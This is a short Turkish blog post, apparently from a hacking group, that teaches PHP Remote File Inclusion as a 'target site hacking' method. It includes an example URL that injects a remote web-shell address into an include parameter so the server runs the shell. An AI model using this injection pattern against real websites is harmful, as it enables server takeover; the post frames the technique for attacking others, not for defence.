Tarih : | at : | Safemode : ON
> root@redhatz:~# Alımlar Başlamıştır. İletişim Bölümünden Alım Yapan Yöneticimize Ulaşabilirsiniz.
> root@redhatz:~# #redhatzopturkey 2016 Yeni Dönemi Artık Aktiftir. BİZİ TERCİH ETTİĞİNİZ İÇİN TEŞEKKÜRLER..



Başlık Yazar Yetki Comt Düzenlenen Kategori

Hedef Site Hacking V-6 RedAdalet rwxr-xr-x 0 08:15:00

Başlık Hedef Site Hacking V-6
Yetki rw-r--r--
Yazar RedAdalet
Zaman 08:15:00
Kategori
Share
Hedef site hacking yöntemlerinden birisini daha Elimden Geldiğince Rfi yi Anlatacağım.


Rfi Nedir?

Rfi nin Açılımı ’Remote file inclusion’ yani Uzaktan Dosya Çağırma’dır.

Nasıl Oluşur?

Rfi Adminlerin PHP scriptlerinde Yaptığı hatalardan Kaynaklanır.Bu arada Sadece PHP de bulunur.

Kod:
include 
include_once 
require 
require_once
Bu Değerler dosya dahil etme kodlarıdır.Eğer Admin Bu dosyaları Tanımlamaz ise Boş kalır.Bizde Bu Boş olan yeri Yani Tanımlanmayan Değeri Shell Adresi ile doldurup serverde Shell Çalıştırabiliriz.

Basitce Örn: 

Yani biz bunu ’ www.siteadresi.com/helper.php?KRaL=Shelladresi? ’

Shell adresi ile doldurabiliriz.Sonuç olarak Servere Shell Atmış olduk.

Selam ve dua ile....!

0 yorum:

Yorum Gönder

Makalemizi Okuduysanız Yorum yapabilirsiniz. Küfürlü Yorumlar Silinir Ve Kullanıcı Engellenir. İlginiz İçin Teşekkür Ederiz
#RedHatzOpTurkey

Kaydol: Kayıt Yorumları (Atom)
Blogger tarafından desteklenmektedir.